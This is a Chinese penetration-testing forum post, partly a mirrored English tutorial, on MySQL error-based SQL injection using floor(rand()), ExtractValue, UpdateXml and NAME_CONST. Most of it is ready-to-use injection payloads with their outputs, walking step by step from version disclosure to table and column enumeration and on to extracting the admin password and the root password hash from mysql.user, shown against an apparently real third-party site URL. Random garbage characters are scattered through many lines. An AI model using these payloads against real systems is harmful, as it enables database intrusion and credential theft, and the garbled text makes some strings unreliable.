中国网络渗透测试联盟
标题: mysql ,floor,ExtractValue,UpdateXml三种报错模式注入利用方法 [打印本页]
作者: admin 时间: 2015-11-11 19:03
标题: mysql ,floor,ExtractValue,UpdateXml三种报错模式注入利用方法
1、通过floor报错
可以通过如下一些利用代码
and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));
举例如下: B- V, M; I7 m! [. l% v
首先进行正常查询:
mysql> select * from article where id = 1;
+ p7 m0 `1 ^& \" Y. d+—-+——-+———+
4 W5 S* _, U& y| id | title | content | \$ z5 _3 H5 Q( y- z
+—-+——-+———+! x! p8 P1 c( ~' C% _
| 1 | test | do it |0 n3 U& e! L1 Z; Y% W& \
+—-+——-+———+
假如id输入存在注入的话,可以通过如下语句进行报错。
mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);. d7 T* M& q! y
ERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’
可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
6 l- }, b" n2 O例如我们需要查询管理员用户名和密码:
Method1:
mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
& j: T; _1 {$ J6 W7 I7 PERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’
Method2:
mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
7 g& B* M% W( {' oERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’
2、ExtractValue
8 M6 M2 c8 F9 m. i/ J% @测试语句如下
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
实际测试过程
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–* `3 H- [# ]* f+ T# N) x
ERROR 1105 (HY000): XPATH syntax error: ’\admin888′
3、UpdateXml
测试语句
and 1=(updatexml(1,concat(0x3a,(select user())),1))
实际测试过程
mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’
1 P. ^! y" m' e8 t* U7 x' m9 e y' F: g5 I+ d6 V7 ]
再收集:
/ ]9 L: g1 m' z9 l& i% v# I! v* Ehttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)
! L) t/ B* `; a0 j9 \- h$ ] C4 Z
Error
uplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’0 O {+ ^0 R7 i& O& P
! ]+ k1 k5 s; i, M0 p. C, q* ghttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)
) |/ h2 U- p1 G4 l' I) Z7 g( b6 U( V
Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′
4 @+ X' ?/ Y l K* t/ I. ~- H9 z# y% J- m; V, L
MYSQL高版本报错注入技巧-利用NAME_CONST注入1 f* j( r' w8 M- B" c/ V% T8 V% D
It's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.
6 ]. P% U4 i# A- [; h1 X3 P5 p+ M- Q3 r* X8 D9 s& Y5 [
4 L. w7 c% E% ~
相关信息
' g9 q& d* j x
3 r& V! ^: ~( z3 Q( I% G5 MNAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.# n. _5 D; \; q% r4 m
' W; r3 R# O' }Code:6 c1 e7 h; L# |' c$ }5 j7 m
NAME_CONST(DATA, VALUE)
& c2 N6 ~7 m- m: r& I- ]0 j: X0 I: K8 ?3 r o( J. E
Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.: [4 d4 o( a7 ]
- i% E3 ] Q2 XSELECT NAME_CONST('TEST', 1)
) M) `/ p' X q6 R$ p1 u, k) D% X p. y4 p$ o
# q( |+ {4 n% A6 {7 E
5 {# M, n( m/ _$ l: L! z|---------------|
2 D- ]3 E9 p6 A! Y8 F/ r2 ~5 a| TEST |
3 S, J2 g5 l) [- U6 ^) b| |$ q0 ]5 v6 U: r
|---------------|4 w0 d* a+ A$ d- j7 U6 G
| 1 |6 S! N5 J; ?# `2 O
| |
6 n, [3 q5 J: v1 ^. f0 |6 o|---------------|
1 K0 I/ D; N+ v2 ^1 W% X) K0 a7 f9 I: f9 x# c
. l9 t! |; t8 l! l4 g- c5 [; K5 q- N- |! L8 K6 ^8 M
: q. H; z' X6 c
http://dev.mysql.com/doc/refman/5.0/en/m...name-const& D5 B# m# R* r1 P( A/ S/ a7 I
Intro to MySQL Variables+ z0 Q0 T5 w& u" y$ \4 I
6 ? v0 p' \+ X0 F3 @# n( ~7 U% Y( ]Once you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.' {, H6 _/ F* x5 r3 T, b
( g$ E: _" N. _$ Y5 X
Code:5 x7 |' S$ F0 |. ]" [/ l3 t3 m* L
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261
, ?( S5 Z* u" ^5 J
& y" A2 q6 y- V
5 J# X, Q, V; r) ?
' s1 x" b2 ~; ~" S( w( ^7 w& z
/ ]$ [$ {5 u, g6 |. N# ?# O m6 r4 C/ n4 }" o1 S. \
Code:
; `: k2 d- O3 @- P3 ~and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--) f) F2 b! h( z2 [; j/ T
; \- ~$ ~" I' R9 k
. p% Z: @, v$ ]8 P5 F+ X+ ZVAR = Your MySQL variable.+ o- _3 \' w5 i0 [4 x8 e! Y1 b
C2 ^$ B1 E; i
MySQL 5.1.3 Server System Variables2 `( ~% {& Q3 C# |
- c0 @ _5 u* x* c# P2 DLet's try it out on my site..
8 c% x3 m4 o* j2 ]8 t
+ C9 q0 I! ] o" CCode:( C( i% ?0 r9 a+ b
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--2 Q g0 t2 }. B4 s! m1 R3 k
' P* v" i$ \3 ^" k- x( D
Erroruplicate column name '5.0.27-community-nt'
) n r' l, l" A, h7 G- X0 D& C% }& A6 M$ A
* o: A! \+ F- \* J* v1 j8 G, X0 ~- m
9 F( |# M I% B" @9 K. z
0 [% [; j3 p0 {) N9 t0 }( sNow I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...5 `+ V% ?& V; |$ Y, M5 `0 b1 q. c& w
- T- b' }" ?5 ^' BData Extraction
; W8 |4 ?: j3 \1 Q& Z2 ^3 }8 A+ U) I1 S4 a' p$ _9 H! v
Code:
" V5 @# h3 ~. c7 }" S% w+ j+ K+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--
. y! b: _! a1 t9 A* y8 k, }# z T+ R/ I; O& p" C* y
: l. ]( T+ X8 {3 b3 c0 b/ C2 RWe should get a duplicate column 1 error...
# n8 @2 Y) D9 N2 E/ u) b
% L- f- ~- a4 {9 E8 C2 \Code:& ^, F9 a$ g" s2 y
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--) `4 C: z8 i6 b* l# k1 ^: W
" K% [9 g8 O% w
Erroruplicate column name '1
6 q. c6 A# |6 c8 k. H4 t3 C+ A4 n- t4 d4 t* @7 I) R2 B$ J4 {
% G1 M9 B7 Z" @, @9 r6 W" Y0 H) U* e4 R5 D/ J3 `- |
2 ?/ V: F* U9 m' M( o
D* E/ T0 ^2 n' l; s0 {' N# f
Now let's get the tables out this bitch.. A( i8 b& p0 }& j
/ ~' p8 o( N+ c0 e* Z; ^5 }Code:
2 J* c, _- @6 W2 x, V$ s% z/ Q& B+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--: |7 D5 A6 g: I
+ B, D3 ~& G( }) `2 u+ c
( n+ ]$ U# i: q3 ^. kLet's see if it works here, if it does, we can go on and finish the job.
+ P1 C/ ^+ n1 s
3 S; U! Z6 f& fCode:4 O+ r8 f+ f5 y& L, V x: E
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
# A4 k. F( @! `+ w0 K5 m/ K9 g0 C2 l& z6 H
* [7 c* r! W7 y+ R" D
Erroruplicate column name 'com_admanage, w4 ^8 b) Q8 ^8 N7 ?3 ^7 _5 H2 B
2 p& H M1 O; n7 e
% B9 {! j* M/ Y& b6 N4 x* h! S( @3 O( F/ q
3 {2 y G: k* v/ `/ J# s1 w& a
+ k) g: C c E9 u1 B2 p" L' u1 F& ?8 m
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.
A# ~ [/ E& P9 i4 S' @. k7 U% w% y0 M* s) C; O- ^! {" P7 O
Let's get the columns out of the user table..) Z9 S; o1 j" m2 \$ f$ i
% j6 q" h6 q0 h- w- _9 C. F8 ~! mCode:
8 I2 W V N2 |+ h6 R* C+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--
/ E4 a: S2 W# y, B8 {6 y- U3 A( t8 n1 `" F
g& k' g O O2 XSo mine looks like this, and I get the duplicate column name 'Host'.5 J4 j: c* f/ X$ g) y* V
' @. J, w2 K* M! ICode:. h5 T* r% u' ]2 ^5 ?
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--$ [0 x8 L4 @" d" m" l) m' }! t; b
* p) A D1 I! l) i- I* ^+ z+ C
Erroruplicate column name 'Host'
9 t- y: h% q" U( ]$ f; s+ g8 W) p8 w7 p. ?
& I0 ~* I! r3 ?
. ?; e- ~$ r7 W; R9 l5 R6 z
: b! J5 _. w' j5 K1 w5 g1 W
3 n* f) H4 H) R+ W5 s/ U) i# t8 K0 r. S: _
Woot, time to finish this bitch off.* Y" p0 K1 o' j0 c5 M8 P
0 j/ Z0 P& y! u# v$ C8 G; t. ^( JCode:
6 |8 [6 I6 `6 a8 R4 U4 b+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--
/ A8 a# ?; ?3 C e0 y: C% c$ j8 S! R0 r2 |
5 \7 }3 {1 \2 W ySo mine looks like this..., m" V, b+ }2 v3 \& C% ]$ ? ?
- f$ {4 b3 o7 O( XCode:
~6 f& V5 ~* U+ C4 X' |- Vhttp://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--. Y! \: A3 o7 D5 X k; B# G
" S# x8 e5 |* oErroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
" p7 p0 x# m: I" f% u
, P0 ]9 s* m2 ?9 m3 X8 C
) ^- u( [4 u/ O& ?& @* [ * g7 x0 _1 n5 D, x; c5 p
u, N% M1 ~1 N Z0 H5 l3 S2 _4 {/ Y) |3 K! Y
, h4 o1 x- J" x& e1 a4 M
And there we have it, thanks for reading.- m) f3 C7 h& z/ d* b$ G- W
' m! N; d" y' c" f6 _
| 欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) |
Powered by Discuz! X3.2 |